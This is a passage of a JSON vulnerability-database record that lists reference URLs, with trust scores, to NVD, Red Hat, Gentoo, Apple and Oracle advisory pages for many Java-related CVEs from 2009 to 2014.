"http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4540" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0441" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5823" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0870" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3554" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0862" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1713" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0706" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0434" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5784" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5830" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5800" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5803" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5086" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3556" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0425" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2383" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2447" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2445" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5778" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5780" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5073" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5069" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-5035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3541" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3549" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1500" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3571" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0426" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5850" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3552" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-1876" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2384" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3521" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5085" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2407" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2421" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2429" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5068" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5071" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0815" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1475" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0497" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5774" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5782" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1725" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5790" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5805" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5802" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0442" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5825" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0506" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1484" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2430" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3541" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0872" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1718" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5772" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0433" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5074" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5072" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2436" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4416" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0822" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1537" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3553" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0025" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0169" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5077" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0435" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3544" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1723" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1726" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1571" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5081" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5840" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2473" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6629" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5783" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3560" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1480" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4351" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0501" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0428" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0869" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2417" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2471" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5076" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5842" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1724" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5797" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5070" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1486" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1488" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0502" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0868" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0440" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3389" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5814" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5817" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4351" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3551" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2455" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5089" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5824" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://www.oracle.com/technetwork/java/javase/releasenotes-136954.html" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5846.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5775.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5844.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5788.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5777.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5854.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5788" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5810" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5810.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/java/javase/7u45-relnotes-2016950.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/java/javase/7u40-relnotes-2004172.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5777" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5775" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2468.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2456" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2464" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2455" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2463.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2446.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5896.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1500.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2444.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2445.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2454.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2459" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0428.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1571" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0414.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5910.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2468" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2466" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2465" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2446" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2451" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2451.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2450" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5899.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2442" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2453" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2469" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2445" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0416.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2456.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-3743.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0403.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1500" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2407.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2470.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5902.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0368.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5889.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0415.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2437" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2471.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0375.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2443.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5878.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2457.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2412.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2407" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2447" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0376.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2443" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2461.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2452" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0410.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2447.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2452.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2464.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1571.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2463" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5907.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2465.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2472.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2466.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0373.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.1, "url": 